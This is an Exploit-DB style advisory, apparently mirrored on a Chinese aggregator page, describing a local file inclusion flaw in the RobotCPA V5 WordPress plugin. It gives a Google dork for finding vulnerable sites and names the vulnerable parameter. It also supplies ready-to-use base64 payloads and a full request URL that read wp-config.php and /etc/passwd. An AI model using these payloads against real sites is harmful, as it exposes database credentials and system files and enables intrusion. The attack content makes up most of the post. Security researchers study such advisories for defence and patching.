WordPress Plugin RobotCPA V5 – Local File Inclusion

Exploit Database
14 阅读

作者： T3N38R15

日期： 2015-06-10
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37252/

# Exploit Title: WordPress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
 Linux(Firefox)
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
Like that : 
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk

our injection look then like that :
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.

greets to Black Sniper
Regards T3N38R15

last Exploits
WordPress Plugin RobotCPA V5 – Local File Inclusion的更多信息

Joomla! Component Table JX – Cross-Site Scripting：
Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload：
ProjectSend r754 – Insecure Direct Object Reference：
QNAP Photo Station 5.7.0 – Cross-Site Scripting：
Symphony CMS 2.1.2 – Blind SQL Injection：
Answerdev 1.0.3 – Account Takeover：
Nameko – ‘nameko.php’ Cross-Site Scripting：
Joomla! Component com_discussions – SQL Injection：